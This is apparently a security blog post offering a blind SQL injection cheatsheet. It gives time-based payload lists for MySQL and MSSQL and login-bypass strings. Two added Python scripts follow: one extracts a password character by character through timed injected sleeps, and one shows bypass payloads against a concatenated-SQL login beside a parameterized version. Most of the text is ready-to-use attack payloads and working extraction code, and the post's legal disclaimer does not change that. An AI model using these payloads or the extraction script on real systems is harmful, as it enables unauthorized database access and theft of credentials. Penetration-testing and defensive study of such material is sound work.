
Blind SQL Injection Cheatsheet

DarkSoul.Story 2022. 2. 11. 22:46
Under the Act on the Protection of Information and Communications Infrastructure, intruding into an information and communications network without legitimate access authorization, or beyond the scope of the authorization granted, is punishable under the relevant laws.

Testing against any system you are not authorized to test is strictly prohibited, and any legal liability arising from malicious use rests solely with the user. Reading this post constitutes agreement to this.

What is SQL Injection?

SQL injection is a web application vulnerability that lets an attacker interfere with the queries an application makes to its database. It typically lets the attacker view data they could not normally retrieve, which may include data belonging to other users or any other data the application itself can access. Going further, the attacker can modify or delete data, persistently changing the application's content or behaviour.

What is Blind SQL Injection?

Blind SQL injection is a type of SQL injection in which the application returns neither the query results nor any database error in its response. The attacker instead asks the database true-or-false questions and determines the answer from how the application responds (a difference in content, status, or timing).

What is Time-Based SQL Injection?

Time-based SQL injection is an inferential (blind) SQL injection technique that relies on sending the database a query that makes it wait a specified number of seconds before responding. The response time tells the attacker whether the injected condition evaluated to TRUE or FALSE. Because network latency and server load add noise, choose a delay well above the normal response time, measure a baseline first, and repeat a positive result before trusting it.

Payload List

Payloads can be injected into search fields, name fields, date pickers, email fields, password fields (registration, login, password reset, etc.), menus, keyword searches, payment fields, cookies, and HTTP headers such as User-Agent, Referer and X-Forwarded-For.

MySQL Blind SQL Injection : Time Based

Note: MySQL's SLEEP() requires parentheses. The `sleep 5` variants below (carried over from public payload lists) are syntax errors in MySQL and will never delay, so treat them as noise. BENCHMARK() produces its delay by burning CPU, so the wait depends on server hardware and load rather than being a fixed number of seconds; confirm that the delay scales with the iteration count before trusting a single slow response.

0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(),sleep(5),0)
'XOR(if(now()=sysdate(),sleep(5),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
if(now()=sysdate(),sleep(5),0)/*"XOR(if(now()=sysdate(),sleep(5),0))OR"*/
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/
if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"*/
SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/
%2c(select%20*%20from%20(select(sleep(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
'%2b(select*from(select(sleep(5)))a)%2b'
(select*from(select(sleep(5)))a)
1'%2b(select*from(select(sleep(5)))a)%2b'
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--
'+(select*from(select(sleep(5)))a)+'
(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"
(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f
(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/
AND BLIND:
1 and sleep 5--
1 and sleep 5
1 and sleep(5)--
1 and sleep(5)
' and sleep 5--
' and sleep 5
' and sleep 5 and '1'='1
' and sleep(5) and '1'='1
' and sleep(5)--
' and sleep(5)
' AnD SLEEP(5) ANd '1
and sleep 5--
and sleep 5
and sleep(5)--
and sleep(5)
and SELECT SLEEP(5); #
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
 and sleep 5--
 and sleep 5
 and sleep(5)--
 and sleep(5)
 and SELECT SLEEP(5); #
' AND SLEEP(5)#
" AND SLEEP(5)#
') AND SLEEP(5)#
OR BLIND:
or sleep 5--
or sleep 5
or sleep(5)--
or sleep(5)
or SELECT SLEEP(5); #
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
 or sleep 5--
 or sleep 5
 or sleep(5)--
 or sleep(5)
 or SELECT SLEEP(5); #
' OR SLEEP(5)#
" OR SLEEP(5)#
') OR SLEEP(5)#

SUBQUERY BLIND:
AND / OR are interchangeable in the payloads below
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337

RLIKE BLIND:
AND / OR are interchangeable
RLIKE SLEEP(5)--
' RLIKE SLEEP(5)--
' RLIKE SLEEP(5)-- 1337
" RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5) AND ('1337'='1337
')) RLIKE SLEEP(5) AND (('1337'='1337
'))) RLIKE SLEEP(5) AND ((('1337'='1337
) RLIKE SLEEP(5)-- 1337
) RLIKE SLEEP(5) AND (1337=1337
)) RLIKE SLEEP(5) AND ((1337=1337
))) RLIKE SLEEP(5) AND (((1337=1337
1 RLIKE SLEEP(5)
1 RLIKE SLEEP(5)-- 1337
1 RLIKE SLEEP(5)# 1337
) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' RLIKE SLEEP(5) AND '1337'='1337
') RLIKE SLEEP(5) AND ('1337' LIKE '1337
')) RLIKE SLEEP(5) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(5) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(5) AND '1337%'='1337
' RLIKE SLEEP(5) AND '1337' LIKE '1337
") RLIKE SLEEP(5) AND ("1337"="1337
")) RLIKE SLEEP(5) AND (("1337"="1337
"))) RLIKE SLEEP(5) AND ((("1337"="1337
" RLIKE SLEEP(5) AND "1337"="1337
") RLIKE SLEEP(5) AND ("1337" LIKE "1337
")) RLIKE SLEEP(5) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(5) AND ((("1337" LIKE "1337
" RLIKE SLEEP(5) AND "1337" LIKE "1337
' RLIKE SLEEP(5) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(5)-- 1337

ELT Blind:
AND / OR are interchangeable
' AND ELT(1337=1337,SLEEP(5))--
' AND ELT(1337=1337,SLEEP(5))-- 1337
" AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(5))-- 1337
) AND ELT(1337=1337,SLEEP(5)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(5))
1 AND ELT(1337=1337,SLEEP(5))-- 1337
1 AND ELT(1337=1337,SLEEP(5))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(5)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1
%' AND ELT(1337=1337,SLEEP(5)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
'||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+'
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337

BENCHMARK:
AND / OR are interchangeable
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337
%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337
" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337
' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337

MSSQL Server Blind : Time Based

With any of the payloads below, a vulnerable server sends its response only after a 5-second wait.

;waitfor delay '0:0:5'--
';WAITFOR DELAY '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
") IF (1=1) WAITFOR DELAY '0:0:5'--
';%20waitfor%20delay%20'0:0:5'%20--%20
' WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '0:0:5'
or WAITFOR DELAY '0:0:5'--
or WAITFOR DELAY '0:0:5'
and WAITFOR DELAY '0:0:5'--
and WAITFOR DELAY '0:0:5'
WAITFOR DELAY '0:0:5'
;WAITFOR DELAY '0:0:5'--
;WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'--
1 WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'-- 1337
1' WAITFOR DELAY '0:0:5' AND '1337'='1337
1') WAITFOR DELAY '0:0:5' AND ('1337'='1337
1) WAITFOR DELAY '0:0:5' AND (1337=1337
') WAITFOR DELAY '0:0:5'--
" WAITFOR DELAY '0:0:5'--
')) WAITFOR DELAY '0:0:5'--
'))) WAITFOR DELAY '0:0:5'--
%' WAITFOR DELAY '0:0:5'--
") WAITFOR DELAY '0:0:5'--
")) WAITFOR DELAY '0:0:5'--
"))) WAITFOR DELAY '0:0:5'--

Payload Test

Suppose a web application is backed by MSSQL. To test its email input field for SQL injection with one of the payloads above, the request could look like this:

email=test@gmail.com ' WAITFOR DELAY '0:0:5'--
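
The single probe above only shows that the field is injectable. The following is an added example, not code from the original post, showing how the time-based technique described in the "What is Time-Based SQL Injection?" section turns such a probe into data extraction: it generalizes the page's single true/false check into a binary search that recovers a value with about seven requests per character. The vulnerable application, its users table and the secret are constructed stand-ins running on an in-memory SQLite database with a Python-registered sleep() function (SQLite has none of its own), and the delay is shortened to 50 ms so the script finishes quickly; against MySQL you would use SLEEP(5) and the prefixes from the payload lists above.

```python
import sqlite3
import time

# --- Constructed stand-in for the vulnerable application (example, not from the page) ---
DELAY = 0.05          # seconds the injected sleep() waits; real payloads use 5
SECRET = "S3cr3t!"    # constructed value the attacker does not know in advance


def make_vulnerable_app():
    """Return a function that behaves like a vulnerable lookup endpoint:
    it concatenates user input straight into SQL and returns a fixed body."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so MySQL-style payloads have something to call.
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET,))

    def lookup(username):
        # VULNERABLE: string concatenation. Nothing useful is returned to the caller.
        query = f"SELECT username FROM users WHERE username = '{username}'"
        conn.execute(query).fetchall()
        return "ok"   # the attacker only ever sees this fixed string
    return lookup


# --- Attacker side: infer one bit per request from the response time ---
def is_true(app, condition):
    """Inject a conditional sleep and decide TRUE/FALSE from the elapsed time."""
    payload = (
        f"admin' AND (SELECT CASE WHEN {condition} THEN sleep({DELAY}) ELSE 0 END "
        f"FROM users WHERE username = 'admin')--"
    )
    start = time.perf_counter()
    app(payload)
    # Threshold at half the delay: far above a normal response, far below a sleep.
    return time.perf_counter() - start >= DELAY / 2


def bsearch(app, expr, lo, hi):
    """Find the integer value of SQL expression `expr`, known to lie in [lo, hi],
    with one timed request per halving of the interval."""
    while lo < hi:
        mid = (lo + hi) // 2
        if is_true(app, f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_password(app, max_len=64):
    """Recover admin's password: first its length, then each character's code point."""
    length = bsearch(app, "length(password)", 0, max_len)  # assumes len <= max_len
    chars = []
    for pos in range(1, length + 1):
        # Printable ASCII 32..126; unicode() returns the code point of the character.
        code = bsearch(app, f"unicode(substr(password, {pos}, 1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    app = make_vulnerable_app()
    print(extract_password(app))
```

The attacker never reads the response body: every decision comes from whether the request took longer than DELAY/2. On a real target, replace the SQLite CASE/unicode()/substr() expressions with the MySQL or MSSQL equivalents (IF(), ORD(), SUBSTRING(); ASCII() and WAITFOR DELAY on MSSQL) and widen the threshold to absorb network jitter.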

SQL Injection Authentication Bypass

'=' 'or'
' or ''='
/1#\
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
1'or'1'='1
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
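
Why these strings work, and why a payload's quote/parenthesis prefix has to match the query it lands in: the following added example (not code from the original post) runs four of the payloads above against a constructed vulnerable login that concatenates input into its SQL, first in the username field and then in the password field, next to a parameterized version that defeats all of them. The users table, credentials and in-memory SQLite database are constructed for the example. The `')`-prefixed payload fails with a syntax error here because this query has no surrounding parentheses, which is exactly the situation the `')` variants in the list exist for.

```python
import sqlite3


def make_db():
    """Constructed sample users (example data, not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "correct horse"), ("alice", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """Concatenates input into SQL. A quote in the input closes the string literal,
    so the rest of the input is parsed as SQL ('--' comments out the password check)."""
    query = ("SELECT username FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the values travel separately from the
    SQL text, so quotes and comment markers inside them are just data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def try_payload(login, conn, payload, field):
    """Inject `payload` into one field and report what the login returned.
    'error' means the database rejected the query, which happens when the
    payload's quoting/parenthesis prefix does not fit the query it lands in."""
    try:
        if field == "username":
            return login(conn, payload, "x")       # wrong password on purpose
        return login(conn, "admin", payload)
    except sqlite3.OperationalError:
        return "error"


PAYLOADS = ["admin' --", "admin' or '1'='1", "' or ''='", "admin') or ('1'='1"]

if __name__ == "__main__":
    conn = make_db()
    for field in ("username", "password"):
        for p in PAYLOADS:
            vuln = try_payload(login_vulnerable, conn, p, field)
            safe = try_payload(login_safe, conn, p, field)
            print(f"{field:8} {p!r:24} vulnerable={vuln!r:8} safe={safe!r}")
```

Note that `' or ''='` bypasses the check only when placed in the password field: in the username field, AND binds tighter than OR, so the injected `''=''` is still ANDed with the wrong password and no row matches. `admin' --` does the opposite, working only in the username field, because the comment must come after the username comparison to cut off the password check.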

References

Testing for SQL Injection (OTG-INPVAL-005)
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)

SQL Injection Bypassing WAF
https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF

Reviewing Code for SQL Injection
https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection

PL/SQL:SQL Injection
https://www.owasp.org/index.php/PL/SQL:SQL_Injection

Testing for NoSQL injection
https://www.owasp.org/index.php/Testing_for_NoSQL_injection

SQL Injection Query Parameterization Cheat Sheet
https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html

SQL injection detection and exploitation:
http://www.securityidiots.com/Web-Pentest/SQL-Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
https://github.com/payloadbox/sql-injection-payload-list
https://github.com/Y000o/Payloads_xss_sql_bypass/blob/master/Payloads_xss_sql_bypass.md
